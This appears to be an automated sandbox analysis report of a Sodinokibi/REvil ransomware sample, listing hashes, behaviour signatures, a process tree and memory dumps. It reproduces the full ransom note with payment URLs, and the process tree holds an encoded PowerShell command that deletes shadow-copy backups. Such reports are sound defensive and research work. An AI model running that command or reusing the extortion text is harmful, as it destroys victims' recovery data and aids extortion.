Analysis

  • max time kernel
    124s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    20-08-2020 13:04

General

  • Target

    d91fb28bbaf54e85e5a87e608c2bb630e7be06815f17541d680823faab4a8fb5.bin.exe.dll

  • Size

    116KB

  • MD5

    f8c9fd29c9cded8ceda5876b41666f70

  • SHA1

    35d95ecbdb2045906e7d61f10495af1a009b413e

  • SHA256

    d91fb28bbaf54e85e5a87e608c2bb630e7be06815f17541d680823faab4a8fb5

  • SHA512

    c7f44b93315e606d75096e2fd54a826bd808e30ea9344f82ceb9238b608f6ff6e95619c7c40a7253b10d9b1ab8d4184be726d6f0c3f114e3986eac74a8491197

Malware Config

Extracted

Path

C:\57d82d60c7-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 57d82d60c7. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4CAA9B11342EBA93 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/4CAA9B11342EBA93 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: lgW2AlrR9Z/vwskT6QMCneTJ+H/mtPDHPhGeFuJcTKNmrR0h780trQFrfy8ZW5Js vzGtJYDE0/9GNkPcMaI104kpJir97w/uO8Oh80/Mgn0SyFzc+HwGdWrCzifB4Lsq TGG5qTBxY663AS0mAuhj1rI07r4S6Q69/mQzfUAAM1neI3r/Quvsc/WbbPU/MMql 98oFRDZTAkoyf7ywkD8T0DjY3x57w47KAwkeoSyzNhGR45QdAPSvLL2Aw8bSIX/o o5bDF4PSDTOOZUt3jHnQwONTifLnftlo+4zrr5CGDQg7EWYAS1zqZ0CGVcStELNh orDOI0HQgDwor4VTeh1Wbkd46i2LPn2uebFlRW7HrHL4xYVrOythDhgzrn6iVi4i Q4+rxz7FVPf4UXUwVYxZaR+zdDk6l3iODtwTMC92RNOD5mjxliDF9sFc5FQpQZiT nJlVuY4Md3Dds1ndP9MjmvBATiI9MS/EtlIkPkjcBRpdpSwutO+StDWrzCva+i5i XPYXnVbRfHAgzfaRarA8yE2YxySjsTy5HqIycaEX02IsfhYm0qQkvd3nHytOG93K ixYPKGrsVqJdc/q4w+7KhTm/axkLpMyVEilLfWwTagEVfsJDNeTWBJCcih7ATMTB Veer43w5kCfmYBVOQEVlu8evd2UEFmjB85UBVxAPP9+NXjpWUgZrbV7LvWmWKJ31 2Ovt4eEfsWJ2uoYWxNvRkUOW/LUqBHVdRdOzx6dttzFVBASFrpma4/ZdQAf3dPW5 BWHKi64xqOfB8v5EcepY+OrLFUpZeQfgg+GZAZF9Xqh2Ek6zPu7tJlYznRisD0DA ENuyh6dabojXLyFnocIVBiQDgldAgz33I8Z7xwUoK+1u9aBLsk2/is01g5d0jqOI /gkbIg2Gj95MHqjIjwXiXVgKRxryB68WaPJOq3wjR7a0R4zYqw7Nx4bNJJGy79ar NnTEW+URxskcoEeJYTLnF9LC1A2kXfTymlJYqbg1B3wZAvU6hNwljz8/lAthRuiR 2tyN0mjDgwda3bIaZe2UEL8Wh3ZT4sTjsO8I5KcZgQkE5XlWQ8tagjOiC8FuDzNV ncVNsOWk/XDf9efFfatSNhrs5NXrJH+O20c9ARL5dgAJeB6pHlj29/KY8LUfms6K MXxHSyEVBrfUOsdlGWIrbhTs7aQHnyZW8i/jX4RM6RiPw5JkvsCVV8Es4JE46x46 k0MhJJQFxwFdJsr9uOUsCEIR/XCAGivuGLeZDm11+qIn6sfSR73VKvuAVejhz80S T0cFuFQjn0CEyHN5geBQHwub2Qw+tET3AG7OmTKfbj8cLLX5NPiS8A== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4CAA9B11342EBA93

http://decryptor.cc/4CAA9B11342EBA93

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 157 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\d91fb28bbaf54e85e5a87e608c2bb630e7be06815f17541d680823faab4a8fb5.bin.exe.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:612
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\d91fb28bbaf54e85e5a87e608c2bb630e7be06815f17541d680823faab4a8fb5.bin.exe.dll,#1
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1460
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1616
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:1848

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/884-0-0x0000000000000000-mapping.dmp

    • memory/1460-1-0x0000000000000000-mapping.dmp

    • memory/1460-2-0x000007FEF5BE0000-0x000007FEF65CC000-memory.dmp

      Filesize

      9.9MB

    • memory/1460-3-0x0000000002460000-0x0000000002461000-memory.dmp

      Filesize

      4KB

    • memory/1460-4-0x000000001AAA0000-0x000000001AAA1000-memory.dmp

      Filesize

      4KB

    • memory/1460-5-0x0000000002550000-0x0000000002551000-memory.dmp

      Filesize

      4KB

    • memory/1460-6-0x00000000024A0000-0x00000000024A1000-memory.dmp

      Filesize

      4KB

    • memory/1460-7-0x000000001B510000-0x000000001B511000-memory.dmp

      Filesize

      4KB